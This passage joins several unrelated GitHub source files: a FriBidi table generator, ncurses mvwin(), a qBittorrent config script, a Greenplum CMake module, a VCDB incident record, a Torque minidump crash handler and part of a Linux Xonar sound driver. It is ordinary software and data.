while (fgets (buf, sizeof buf, f))
{
int i;
const char *s = buf;
l++;
while (*s == ' ')
s++;
if (*s == '#' || *s == '\0' || *s == '\n')
continue;
i = sscanf (s, "%lx;%*[^;];%[^; ];%*[^;];%[^; ]", &c, tp_gen, tp_bidi);
if (i != 3 || c >= FRIBIDI_UNICODE_CHARS)
die3l ("UnicodeData.txt: invalid input at line %ld: %s", l, s);
if (type_is (tp_bidi, ignored_bidi_types))
table[c] = G;
if (type_is (tp_gen, transparent_general_categories))
table[c] = T;
}
}
static void
read_arabic_shaping_txt (
FILE *f
)
{
unsigned long c, c2, l;
l = 0;
while (fgets (buf, sizeof buf, f))
{
int i;
register char typ;
const char *s = buf;
l++;
while (*s == ' ')
s++;
if (*s == '#' || *s == '\0' || *s == '\n')
continue;
i = sscanf (s, "%lx ; %*[^;]; %[^; ]", &c, tp);
if (i == 2)
c2 = c;
else
i = sscanf (s, "%lx..%lx ; %*[^;]; %[^; ]", &c, &c2, tp) - 1;
if (i != 2 || c > c2 || c2 >= FRIBIDI_UNICODE_CHARS)
die3l ("ArabicShaping.txt: invalid input at line %ld: %s", l, s);
typ = get_type (tp);
for (; c <= c2; c++)
table[c] = typ;
}
}
static void
read_data (
const char *data_file_type[],
const char *data_file_name[]
)
{
FILE *f;
for (; data_file_name[0] && data_file_type[0];
data_file_name++, data_file_type++)
{
if (!(f = fopen (data_file_name[0], "rt")))
die2 ("error: cannot open `%s' for reading", data_file_name[0]);
if (!strcmp (data_file_type[0], "UnicodeData.txt"))
read_unicode_data_txt (f);
else if (!strcmp (data_file_type[0], "ArabicShaping.txt"))
read_arabic_shaping_txt (f);
else
die2 ("error: unknown data-file type %s", data_file_type[0]);
fclose (f);
}
}
static void
gen_joining_type_tab (
int max_depth,
const char *data_file_type[]
)
{
printf ("/* " outputname "\n * generated by " appname " (" FRIBIDI_NAME " "
FRIBIDI_VERSION ")\n" " * from the files %s, %s of Unicode version "
FRIBIDI_UNICODE_VERSION ". */\n\n", data_file_type[0],
data_file_type[1]);
printf ("#define PACKTAB_UINT8 uint8_t\n"
"#define PACKTAB_UINT16 uint16_t\n"
"#define PACKTAB_UINT32 uint32_t\n\n");
if (!pack_table
(table, FRIBIDI_UNICODE_CHARS, 1, U, max_depth, 1, names,
"unsigned char", table_name, macro_name, stdout))
die ("error: insufficient memory, decrease max_depth");
printf ("#undef PACKTAB_UINT8\n"
"#undef PACKTAB_UINT16\n" "#undef PACKTAB_UINT32\n\n");
printf ("/* End of generated " outputname " */\n");
}
int
main (
int argc,
const char **argv
)
{
const char *data_file_type[] =
{ "UnicodeData.txt", "ArabicShaping.txt", NULL };
if (argc < 4)
die3 ("usage:\n " appname " max-depth /path/to/%s /path/to/%s [junk...]",
data_file_type[0], data_file_type[1]);
{
int max_depth = atoi (argv[1]);
const char *data_file_name[] = { NULL, NULL, NULL };
data_file_name[0] = argv[2];
data_file_name[1] = argv[3];
if (max_depth < 2)
die ("invalid depth");
init ();
read_data (data_file_type, data_file_name);
gen_joining_type_tab (max_depth, data_file_type);
}
return 0;
}
| {
"pile_set_name": "Github"
} |
/****************************************************************************
* Copyright (c) 1998-2009,2010 Free Software Foundation, Inc. *
* *
* Permission is hereby granted, free of charge, to any person obtaining a *
* copy of this software and associated documentation files (the *
* "Software"), to deal in the Software without restriction, including *
* without limitation the rights to use, copy, modify, merge, publish, *
* distribute, distribute with modifications, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included *
* in all copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS *
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF *
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. *
* IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, *
* DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR *
* OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR *
* THE USE OR OTHER DEALINGS IN THE SOFTWARE. *
* *
* Except as contained in this notice, the name(s) of the above copyright *
* holders shall not be used in advertising or otherwise to promote the *
* sale, use or other dealings in this Software without prior written *
* authorization. *
****************************************************************************/
/****************************************************************************
* Author: Zeyd M. Ben-Halim <[email protected]> 1992,1995 *
* and: Eric S. Raymond <[email protected]> *
* and: Thomas E. Dickey 1996-on *
* and: Juergen Pfeifer *
****************************************************************************/
/*
** lib_mvwin.c
**
** The routine mvwin().
**
*/
#include <curses.priv.h>
MODULE_ID("$Id: lib_mvwin.c,v 1.18 2010/12/19 01:22:58 tom Exp $")
NCURSES_EXPORT(int)
mvwin(WINDOW *win, int by, int bx)
{
#if NCURSES_SP_FUNCS
SCREEN *sp = _nc_screen_of(win);
#endif
T((T_CALLED("mvwin(%p,%d,%d)"), (void *) win, by, bx));
if (!win || (win->_flags & _ISPAD))
returnCode(ERR);
/*
* mvwin() should only modify the indices. See test/demo_menus.c and
* test/movewindow.c for examples.
*/
#if 0
/* Copying subwindows is allowed, but it is expensive... */
if (win->_flags & _SUBWIN) {
int err = ERR;
WINDOW *parent = win->_parent;
if (parent) { /* Now comes the complicated and costly part, you should really
* try to avoid to move subwindows. Because a subwindow shares
* the text buffers with its parent, one can't do a simple
* memmove of the text buffers. One has to create a copy, then
* to relocate the subwindow and then to do a copy.
*/
if ((by - parent->_begy == win->_pary) &&
(bx - parent->_begx == win->_parx))
err = OK; /* we don't actually move */
else {
WINDOW *clone = dupwin(win);
if (clone) {
/* now we have the clone, so relocate win */
werase(win); /* Erase the original place */
/* fill with parents background */
wbkgrnd(win, CHREF(parent->_nc_bkgd));
wsyncup(win); /* Tell the parent(s) */
err = mvderwin(win,
by - parent->_begy,
bx - parent->_begx);
if (err != ERR) {
err = copywin(clone, win,
0, 0, 0, 0, win->_maxy, win->_maxx, 0);
if (ERR != err)
wsyncup(win);
}
if (ERR == delwin(clone))
err = ERR;
}
}
}
returnCode(err);
}
#endif
if (by + win->_maxy > screen_lines(SP_PARM) - 1
|| bx + win->_maxx > screen_columns(SP_PARM) - 1
|| by < 0
|| bx < 0)
returnCode(ERR);
/*
* Whether or not the window is moved, touch the window's contents so
* that a following call to 'wrefresh()' will paint the window at the
* new location. This ensures that if the caller has refreshed another
* window at the same location, that this one will be displayed.
*/
win->_begy = (NCURSES_SIZE_T) by;
win->_begx = (NCURSES_SIZE_T) bx;
returnCode(touchwin(win));
}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# Script Name: AtoMiC qBittorrent settings configurator
echo
echo -e "$YELLOW--->Configuring qBittorrent Settings...$ENDCOLOR"
#Set username
sudo sed -i "s@UNAME@$UNAME@g" $APPSETTINGS || \
{ echo -e "${RED}Modifying UNAME in $APPSETTINGS file failed.$ENDCOLOR"; exit 1; }
LOCALE=${LANG:0:5}
echo 'Locale found:' $LOCALE
#Set Locale
sudo sed -i "s@Locale=@Locale=$LOCALE@g" $APPSETTINGS || \
{ echo -e "${RED}Modifying LOCALE in $APPSETTINGS file failed.$ENDCOLOR"; exit 1; }
| {
"pile_set_name": "Github"
} |
# Set defaults that can be overridden by files that include this file:
if(NOT DEFINED _FIND_PACKAGE_FILE)
set(_FIND_PACKAGE_FILE "${CMAKE_CURRENT_LIST_FILE}")
endif(NOT DEFINED _FIND_PACKAGE_FILE)
# Set parameters for calling FindPostgreSQL.cmake
set(_NEEDED_PG_CONFIG_PACKAGE_NAME "Greenplum Database")
set(_PG_CONFIG_VERSION_NUM_MACRO "GP_VERSION_NUM")
set(_PG_CONFIG_VERSION_MACRO "GP_VERSION")
set(_SEARCH_PATH_HINTS
"/usr/local/greenplum-db/bin"
"$ENV{GPHOME}/bin"
)
include("${CMAKE_CURRENT_LIST_DIR}/../../postgres/cmake/FindPostgreSQL.cmake")
if(${PKG_NAME}_FOUND)
# server/funcapi.h ultimately includes server/access/xact.h, from which
# cdb/cdbpathlocus.h is included
execute_process(COMMAND ${${PKG_NAME}_PG_CONFIG} --pkgincludedir
OUTPUT_VARIABLE ${PKG_NAME}_ADDITIONAL_INCLUDE_DIRS
OUTPUT_STRIP_TRAILING_WHITESPACE
)
set(${PKG_NAME}_ADDITIONAL_INCLUDE_DIRS
"${${PKG_NAME}_ADDITIONAL_INCLUDE_DIRS}/internal")
endif(${PKG_NAME}_FOUND)
| {
"pile_set_name": "Github"
} |
{
"action": {
"physical": {
"variety": [
"Theft",
"Bypassed controls"
],
"vector": [
"Unknown"
]
}
},
"actor": {
"external": {
"country": [
"Unknown"
],
"motive": [
"Financial"
],
"region": [
"000000"
],
"variety": [
"Unknown"
]
}
},
"asset": {
"assets": [
{
"variety": "Unknown"
}
],
"cloud": [
"Unknown"
]
},
"attribute": {
"availability": {
"variety": [
"Loss"
]
},
"confidentiality": {
"data": [
{
"variety": "Unknown"
}
],
"data_disclosure": "Yes",
"data_total": 13
}
},
"discovery_method": {
"unknown": true
},
"incident_id": "06B76E45-468B-4B6A-B1A8-6C11AF3BD562",
"plus": {
"analysis_status": "First pass",
"analyst": "swidup",
"created": "2014-11-24T16:59:31Z",
"master_id": "06B76E45-468B-4B6A-B1A8-6C11AF3BD562",
"modified": "2014-11-24T16:59:31Z"
},
"reference": "http://vcdb.org/pdf/va-security.pdf",
"schema_version": "1.3.4",
"security_incident": "Confirmed",
"source_id": "vcdb",
"summary": "A VA provider had his appointment book stolen on 02/27/13. It contained the first and last initials and last 4 digits of the SSNs for 13 Veterans and the date, time, and abbreviation for the clinic location the provider met with them. There was no other protected health information (PHI) or additional notes recorded in the book. The employee reported the incident to his supervisor and the facility Privacy Officer (PO). VA Police have been notified as well, but a report number has not been provided.",
"timeline": {
"incident": {
"day": 27,
"month": 2,
"year": 2013
}
},
"victim": {
"country": [
"US"
],
"employee_count": "Over 100000",
"industry": "923140",
"region": [
"019021"
],
"state": "OR",
"victim_id": "United States Department of Veterans Affairs"
}
} | {
"pile_set_name": "Github"
} |
//-----------------------------------------------------------------------------
// Copyright (c) 2012 GarageGames, LLC
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to
// deal in the Software without restriction, including without limitation the
// rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
// sell copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
// IN THE SOFTWARE.
//-----------------------------------------------------------------------------
#if defined( TORQUE_MINIDUMP ) && defined( TORQUE_RELEASE )
#include "platformWin32/platformWin32.h"
#include "platformWin32/minidump/winStackWalker.h"
#include "core/fileio.h"
#include "core/strings/stringFunctions.h"
#include "console/console.h"
#include "app/net/serverQuery.h"
#pragma pack(push,8)
#include <DbgHelp.h>
#include <time.h>
#pragma pack(pop)
#pragma comment(lib, "dbghelp.lib")
extern Win32PlatState winState;
//Forward declarations for the dialog functions
BOOL CALLBACK MiniDumpDialogProc(HWND hwndDlg, UINT message, WPARAM wParam, LPARAM lParam);
LRESULT DisplayMiniDumpDialog(HINSTANCE hinst, HWND hwndOwner);
LPWORD lpwAlign(LPWORD lpIn);
char gUserInput[4096];
//Console variables
extern StringTableEntry gMiniDumpDir;
extern StringTableEntry gMiniDumpUser;
extern StringTableEntry gMiniDumpExec;
extern StringTableEntry gMiniDumpParams;
extern StringTableEntry gMiniDumpExecDir;
char* dStrrstr(char* dst, const char* src, const char* findStr, char* replaceStr)
{
//see if str contains findStr, if not then return
const char* findpos = strstr(src, findStr);
if(!findpos)
{
strcpy(dst, src);
}
else
{
//copy the new string to the buffer
dst[0]='\0';
strncat(dst, src, findpos-src);
strcat(dst, replaceStr);
const char* cur = findpos + strlen(findStr);
strcat(dst, cur);
}
return dst;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// CreateMiniDump()
//-----------------------------------------------------------------------------------------------------------------------------------------
INT CreateMiniDump( LPEXCEPTION_POINTERS ExceptionInfo)
{
//Get any information we can from the user and store it in gUserInput
try
{
while(ShowCursor(TRUE) < 0);
DisplayMiniDumpDialog(winState.appInstance, winState.appWindow);
}
catch(...)
{
//dSprintf(gUserInput, 4096, "The user could not enter a description of what was occurring.\n\n\n");
}
//Build a Game, Date and Time stamped MiniDump folder
time_t theTime;
time(&theTime);
tm* pLocalTime = localtime(&theTime);
char crashFolder[2048];
dSprintf(crashFolder, 2048, "%s_%02d.%02d_%02d.%02d.%02d",
Platform::getExecutableName(),
pLocalTime->tm_mon+1, pLocalTime->tm_mday,
pLocalTime->tm_hour, pLocalTime->tm_min, pLocalTime->tm_sec);
//Builed the fully qualified MiniDump path
char crashPath[2048];
char fileName[2048];
if(gMiniDumpDir==NULL)
{
dSprintf(crashPath, 2048, "%s/MiniDump/%s", Platform::getCurrentDirectory(), crashFolder);
}
else
{
dSprintf(crashPath, 2048, "%s/%s", gMiniDumpDir, crashFolder);
}
dSprintf(fileName, 2048, "%s/Minidump.dmp",crashPath);
if (!Platform::createPath (fileName))return false; //create the directory
//Save the minidump
File fileObject;
if(fileObject.open(fileName, File::Write) == File::Ok)
{
MINIDUMP_EXCEPTION_INFORMATION DumpExceptionInfo;
DumpExceptionInfo.ThreadId = GetCurrentThreadId();
DumpExceptionInfo.ExceptionPointers = ExceptionInfo;
DumpExceptionInfo.ClientPointers = true;
MiniDumpWriteDump( GetCurrentProcess(), GetCurrentProcessId(), (HANDLE)fileObject.getHandle(), MiniDumpNormal, &DumpExceptionInfo, NULL, NULL );
fileObject.close();
}
//copy over the log file
char fromFile[2048];
dSprintf(fromFile, 2048, "%s/%s", Platform::getCurrentDirectory(), "console.log" );
dSprintf(fileName, 2048, "%s/console.log", crashPath);
Con::setLogMode(3); //ensure that the log file is closed (so it can be copied)
dPathCopy(fromFile, fileName, true);
//copy over the exe file
char exeName[1024];
dSprintf(exeName, 1024, Platform::getExecutableName());
exeName[dStrlen(exeName)-4]=0;
dSprintf(fromFile, 2048, "%s/%s.dll", Platform::getCurrentDirectory(), exeName );
dSprintf(fileName, 2048, "%s/%s.dll", crashPath, exeName );
dPathCopy(fromFile, fileName, true);
//copy over the pdb file
char pdbName[1024];
dStrcpy(pdbName, exeName, 1024);
dStrncat(pdbName, ".pdb", 4);
dSprintf(fromFile, 2048, "%s/%s", Platform::getCurrentDirectory(), pdbName );
dSprintf(fileName, 2048, "%s/%s", crashPath, pdbName );
dPathCopy(fromFile, fileName, true);
//save the call stack
char traceBuffer[65536];
traceBuffer[0] = 0;
dGetStackTrace( traceBuffer, *static_cast<const CONTEXT *>(ExceptionInfo->ContextRecord) );
//save the user input and the call stack to a file
char crashlogFile[2048];
dSprintf(crashlogFile, 2048, "%s/crash.log", crashPath);
if(fileObject.open(crashlogFile, File::Write) == File::Ok)
{
fileObject.write(strlen(gUserInput), gUserInput);
fileObject.write(strlen(traceBuffer), traceBuffer);
fileObject.close();
}
//call the external program indicated in script
if(gMiniDumpExec!= NULL)
{
//replace special variables in gMiniDumpParams
if(gMiniDumpParams)
{
char updateParams[4096];
char finalParams[4096];
dStrrstr(finalParams, gMiniDumpParams, "%crashpath%", crashPath);
dStrrstr(updateParams, finalParams, "%crashfolder%", crashFolder);
dStrrstr(finalParams, updateParams, "%crashlog%", crashlogFile);
ShellExecuteA(NULL, "", gMiniDumpExec, finalParams, gMiniDumpExecDir ? gMiniDumpExecDir : "", SW_SHOWNORMAL);
}
else
{
ShellExecuteA(NULL, "", gMiniDumpExec, "", gMiniDumpExecDir ? gMiniDumpExecDir : "", SW_SHOWNORMAL);
}
}
return EXCEPTION_EXECUTE_HANDLER;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// MiniDumpDialogProc - Used By DisplayMiniDumpDialog
//-----------------------------------------------------------------------------------------------------------------------------------------
const S32 ID_TEXT=200;
const S32 ID_USERTEXT=300;
const S32 ID_DONE=400;
BOOL CALLBACK MiniDumpDialogProc(HWND hwndDlg, UINT message, WPARAM wParam, LPARAM lParam)
{
char text[128]= "";
switch (message)
{
case WM_INITDIALOG :
SetDlgItemTextA ( hwndDlg, ID_USERTEXT, text );
return TRUE ;
case WM_COMMAND:
switch (LOWORD(wParam))
{
case ID_DONE:
if( !GetDlgItemTextA(hwndDlg, ID_USERTEXT, gUserInput, 4096) ) gUserInput[0]='\0';
strcat(gUserInput, "\n\n\n");
EndDialog(hwndDlg, wParam);
return TRUE;
default:
return TRUE;
}
}
return FALSE;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// Helper function to DWORD align the Dialog Box components (Used in DisplayMiniDumpDialog()
//-----------------------------------------------------------------------------------------------------------------------------------------
LPWORD lpwAlign(LPWORD lpIn)
{
ULONG ul;
ul = (ULONG)lpIn;
ul ++;
ul >>=1;
ul <<=1;
return (LPWORD)ul;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// Create the Dialog Box to get input from the user
//-----------------------------------------------------------------------------------------------------------------------------------------
LRESULT DisplayMiniDumpDialog(HINSTANCE hinst, HWND hwndOwner)
{
HGLOBAL hgbl = GlobalAlloc(GMEM_ZEROINIT, 1024);
if (!hgbl) return -1;
//-----------------------------------------------------------------
// Define the dialog box
//-----------------------------------------------------------------
LPDLGTEMPLATE lpdt = (LPDLGTEMPLATE)GlobalLock(hgbl);
lpdt->style = WS_POPUP | WS_BORDER | DS_MODALFRAME | WS_CAPTION;
lpdt->cdit = 3; // Number of controls
lpdt->x = 100;
lpdt->y = 100;
lpdt->cx = 300;
lpdt->cy = 90;
LPWORD lpw = (LPWORD)(lpdt + 1);
*lpw++ = 0; // No menu
*lpw++ = 0; // Predefined dialog box class (by default)
LPWSTR lpwsz = (LPWSTR)lpw;
S32 nchar = 1 + MultiByteToWideChar(CP_ACP, 0, "MiniDump Crash Report", -1, lpwsz, 50);
lpw += nchar;
//-----------------------------------------------------------------
// Define a static text message
//-----------------------------------------------------------------
lpw = lpwAlign(lpw); // Align DLGITEMTEMPLATE on DWORD boundary
LPDLGITEMTEMPLATE lpdit = (LPDLGITEMTEMPLATE)lpw;
lpdit->x = 10;
lpdit->y = 10;
lpdit->cx = 290;
lpdit->cy = 10;
lpdit->id = ID_TEXT; // Text identifier
lpdit->style = WS_CHILD | WS_VISIBLE | SS_LEFT;
lpw = (LPWORD)(lpdit + 1);
*lpw++ = 0xFFFF;
*lpw++ = 0x0082; // Static class
LPSTR msg = "The program has crashed. Please describe what was happening:";
for (lpwsz = (LPWSTR)lpw; *lpwsz++ = (WCHAR)*msg++;);
lpw = (LPWORD)lpwsz;
*lpw++ = 0; // No creation data
//-----------------------------------------------------------------
// Define a DONE button
//-----------------------------------------------------------------
lpw = lpwAlign(lpw); // Align DLGITEMTEMPLATE on DWORD boundary
lpdit = (LPDLGITEMTEMPLATE)lpw;
lpdit->x = 265;
lpdit->y = 75;
lpdit->cx = 25;
lpdit->cy = 12;
lpdit->id = ID_DONE; // OK button identifier
lpdit->style = WS_CHILD | WS_VISIBLE | WS_TABSTOP;// | BS_DEFPUSHBUTTON;
lpw = (LPWORD)(lpdit + 1);
*lpw++ = 0xFFFF;
*lpw++ = 0x0080; // Button class
lpwsz = (LPWSTR)lpw;
nchar = 1 + MultiByteToWideChar(CP_ACP, 0, "Done", -1, lpwsz, 50);
lpw += nchar;
*lpw++ = 0; // No creation data
//-----------------------------------------------------------------
// Define a text entry message
//-----------------------------------------------------------------
lpw = lpwAlign(lpw); // Align DLGITEMTEMPLATE on DWORD boundary
lpdit = (LPDLGITEMTEMPLATE)lpw;
lpdit->x = 10;
lpdit->y = 22;
lpdit->cx = 280;
lpdit->cy = 50;
lpdit->id = ID_USERTEXT; // Text identifier
lpdit->style = ES_LEFT | WS_BORDER | WS_TABSTOP | WS_CHILD | WS_VISIBLE;
lpw = (LPWORD)(lpdit + 1);
*lpw++ = 0xFFFF;
*lpw++ = 0x0081; // Text edit class
*lpw++ = 0; // No creation data
GlobalUnlock(hgbl);
LRESULT ret = DialogBoxIndirect( hinst,
(LPDLGTEMPLATE)hgbl,
hwndOwner,
(DLGPROC)MiniDumpDialogProc);
GlobalFree(hgbl);
return ret;
}
#endif | {
"pile_set_name": "Github"
} |
/*
* card driver for models with CS4398/CS4362A DACs (Xonar D1/DX)
*
* Copyright (c) Clemens Ladisch <[email protected]>
*
*
* This driver is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License, version 2.
*
* This driver is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this driver; if not, see <http://www.gnu.org/licenses/>.
*/
/*
* Xonar D1/DX
* -----------
*
* CMI8788:
*
* I²C <-> CS4398 (addr 1001111) (front)
* <-> CS4362A (addr 0011000) (surround, center/LFE, back)
*
* GPI 0 <- external power present (DX only)
*
* GPIO 0 -> enable output to speakers
* GPIO 1 -> route output to front panel
* GPIO 2 -> M0 of CS5361
* GPIO 3 -> M1 of CS5361
* GPIO 6 -> ?
* GPIO 7 -> ?
* GPIO 8 -> route input jack to line-in (0) or mic-in (1)
*
* CM9780:
*
* LINE_OUT -> input of ADC
*
* AUX_IN <- aux
* MIC_IN <- mic
* FMIC_IN <- front mic
*
* GPO 0 -> route line-in (0) or AC97 output (1) to CS5361 input
*/
#include <linux/pci.h>
#include <linux/delay.h>
#include <sound/ac97_codec.h>
#include <sound/control.h>
#include <sound/core.h>
#include <sound/pcm.h>
#include <sound/pcm_params.h>
#include <sound/tlv.h>
#include "xonar.h"
#include "cm9780.h"
#include "cs4398.h"
#include "cs4362a.h"
#define GPI_EXT_POWER 0x01
#define GPIO_D1_OUTPUT_ENABLE 0x0001
#define GPIO_D1_FRONT_PANEL 0x0002
#define GPIO_D1_MAGIC 0x00c0
#define GPIO_D1_INPUT_ROUTE 0x0100
#define I2C_DEVICE_CS4398 0x9e /* 10011, AD1=1, AD0=1, /W=0 */
#define I2C_DEVICE_CS4362A 0x30 /* 001100, AD0=0, /W=0 */
struct xonar_cs43xx {
struct xonar_generic generic;
u8 cs4398_regs[8];
u8 cs4362a_regs[15];
};
static void cs4398_write(struct oxygen *chip, u8 reg, u8 value)
{
struct xonar_cs43xx *data = chip->model_data;
oxygen_write_i2c(chip, I2C_DEVICE_CS4398, reg, value);
if (reg < ARRAY_SIZE(data->cs4398_regs))
data->cs4398_regs[reg] = value;
}
static void cs4398_write_cached(struct oxygen *chip, u8 reg, u8 value)
{
struct xonar_cs43xx *data = chip->model_data;
if (value != data->cs4398_regs[reg])
cs4398_write(chip, reg, value);
}
static void cs4362a_write(struct oxygen *chip, u8 reg, u8 value)
{
struct xonar_cs43xx *data = chip->model_data;
oxygen_write_i2c(chip, I2C_DEVICE_CS4362A, reg, value);
if (reg < ARRAY_SIZE(data->cs4362a_regs))
data->cs4362a_regs[reg] = value;
}
static void cs4362a_write_cached(struct oxygen *chip, u8 reg, u8 value)
{
struct xonar_cs43xx *data = chip->model_data;
if (value != data->cs4362a_regs[reg])
cs4362a_write(chip, reg, value);
}
static void cs43xx_registers_init(struct oxygen *chip)
{
struct xonar_cs43xx *data = chip->model_data;
unsigned int i;
/* set CPEN (control port mode) and power down */
cs4398_write(chip, 8, CS4398_CPEN | CS4398_PDN);
cs4362a_write(chip, 0x01, CS4362A_PDN | CS4362A_CPEN);
/* configure */
cs4398_write(chip, 2, data->cs4398_regs[2]);
cs4398_write(chip, 3, CS4398_ATAPI_B_R | CS4398_ATAPI_A_L);
cs4398_write(chip, 4, data->cs4398_regs[4]);
cs4398_write(chip, 5, data->cs4398_regs[5]);
cs4398_write(chip, 6, data->cs4398_regs[6]);
cs4398_write(chip, 7, data->cs4398_regs[7]);
cs4362a_write(chip, 0x02, CS4362A_DIF_LJUST);
cs4362a_write(chip, 0x03, CS4362A_MUTEC_6 | CS4362A_AMUTE |
CS4362A_RMP_UP | CS4362A_ZERO_CROSS | CS4362A_SOFT_RAMP);
cs4362a_write(chip, 0x04, data->cs4362a_regs[0x04]);
cs4362a_write(chip, 0x05, 0);
for (i = 6; i <= 14; ++i)
cs4362a_write(chip, i, data->cs4362a_regs[i]);
/* clear power down */
cs4398_write(chip, 8, CS4398_CPEN);
cs4362a_write(chip, 0x01, CS4362A_CPEN);
}
static void xonar_d1_init(struct oxygen *chip)
{
struct xonar_cs43xx *data = chip->model_data;
data->generic.anti_pop_delay = 800;
data->generic.output_enable_bit = GPIO_D1_OUTPUT_ENABLE;
data->cs4398_regs[2] =
CS4398_FM_SINGLE | CS4398_DEM_NONE | CS4398_DIF_LJUST;
data->cs4398_regs[4] = CS4398_MUTEP_LOW |
CS4398_MUTE_B | CS4398_MUTE_A | CS4398_PAMUTE;
data->cs4398_regs[5] = 60 * 2;
data->cs4398_regs[6] = 60 * 2;
data->cs4398_regs[7] = CS4398_RMP_DN | CS4398_RMP_UP |
CS4398_ZERO_CROSS | CS4398_SOFT_RAMP;
data->cs4362a_regs[4] = CS4362A_RMP_DN | CS4362A_DEM_NONE;
data->cs4362a_regs[6] = CS4362A_FM_SINGLE |
CS4362A_ATAPI_B_R | CS4362A_ATAPI_A_L;
data->cs4362a_regs[7] = 60 | CS4362A_MUTE;
data->cs4362a_regs[8] = 60 | CS4362A_MUTE;
data->cs4362a_regs[9] = data->cs4362a_regs[6];
data->cs4362a_regs[10] = 60 | CS4362A_MUTE;
data->cs4362a_regs[11] = 60 | CS4362A_MUTE;
data->cs4362a_regs[12] = data->cs4362a_regs[6];
data->cs4362a_regs[13] = 60 | CS4362A_MUTE;
data->cs4362a_regs[14] = 60 | CS4362A_MUTE;
oxygen_write16(chip, OXYGEN_2WIRE_BUS_STATUS,
OXYGEN_2WIRE_LENGTH_8 |
OXYGEN_2WIRE_INTERRUPT_MASK |
OXYGEN_2WIRE_SPEED_FAST);
cs43xx_registers_init(chip);
oxygen_set_bits16(chip, OXYGEN_GPIO_CONTROL,
GPIO_D1_FRONT_PANEL |
GPIO_D1_MAGIC |
GPIO_D1_INPUT_ROUTE);
oxygen_clear_bits16(chip, OXYGEN_GPIO_DATA,
GPIO_D1_FRONT_PANEL | GPIO_D1_INPUT_ROUTE);
xonar_init_cs53x1(chip);
xonar_enable_output(chip);
snd_component_add(chip->card, "CS4398");
snd_component_add(chip->card, "CS4362A");
snd_component_add(chip->card, "CS5361");
}
static void xonar_dx_init(struct oxygen *chip)
{
struct xonar_cs43xx *data = chip->model_data;
data->generic.ext_power_reg = OXYGEN_GPI_DATA;
data->generic.ext_power_int_reg = OXYGEN_GPI_INTERRUPT_MASK;
data->generic.ext_power_bit = GPI_EXT_POWER;
xonar_init_ext_power(chip);
xonar_d1_init(chip);
}
static void xonar_d1_cleanup(struct oxygen *chip)
{
xonar_disable_output(chip);
cs4362a_write(chip, 0x01, CS4362A_PDN | CS4362A_CPEN);
oxygen_clear_bits8(chip, OXYGEN_FUNCTION, OXYGEN_FUNCTION_RESET_CODEC);
}
static void xonar_d1_suspend(struct oxygen *chip)
{
xonar_d1_cleanup(chip);
}
static void xonar_d1_resume(struct oxygen *chip)
{
oxygen_set_bits8(chip, OXYGEN_FUNCTION, OXYGEN_FUNCTION_RESET_CODEC);
msleep(1);
cs43xx_registers_init(chip);
xonar_enable_output(chip);
}
static void set_cs43xx_params(struct oxygen *chip,
struct snd_pcm_hw_params *params)
{
struct xonar_cs43xx *data = chip->model_data;
u8 cs4398_fm, cs4362a_fm;
if (params_rate(params) <= 50000) {
cs4398_fm = CS4398_FM_SINGLE;
cs4362a_fm = CS4362A_FM_SINGLE;
} else if (params_rate(params) <= 100000) {
cs4398_fm = CS4398_FM_DOUBLE;
cs4362a_fm = CS4362A_FM_DOUBLE;
} else {
cs4398_fm = CS4398_FM_QUAD;
cs4362a_fm = CS4362A_FM_QUAD;
}
cs4398_fm |= CS4398_DEM_NONE | CS4398_DIF_LJUST;
cs4398_write_cached(chip, 2, cs4398_fm);
cs4362a_fm |= data->cs4362a_regs[6] & ~CS4362A_FM_MASK;
cs4362a_write_cached(chip, 6, cs4362a_fm);
cs4362a_write_cached(chip, 12, cs4362a_fm);
cs4362a_fm &= CS4362A_FM_MASK;
cs4362a_fm |= data->cs4362a_regs[9] & ~CS4362A_FM_MASK;
cs4362a_write_cached(chip, 9, cs4362a_fm);
}
static void update_cs4362a_volumes(struct oxygen *chip)
{
unsigned int i;
u8 mute;
mute = chip->dac_mute ? CS4362A_MUTE : 0;
for (i = 0; i < 6; ++i)
cs4362a_write_cached(chip, 7 + i + i / 2,
(127 - chip->dac_volume[2 + i]) | mute);
}
static void update_cs43xx_volume(struct oxygen *chip)
{
cs4398_write_cached(chip, 5, (127 - chip->dac_volume[0]) * 2);
cs4398_write_cached(chip, 6, (127 - chip->dac_volume[1]) * 2);
update_cs4362a_volumes(chip);
}
static void update_cs43xx_mute(struct oxygen *chip)
{
u8 reg;
reg = CS4398_MUTEP_LOW | CS4398_PAMUTE;
if (chip->dac_mute)
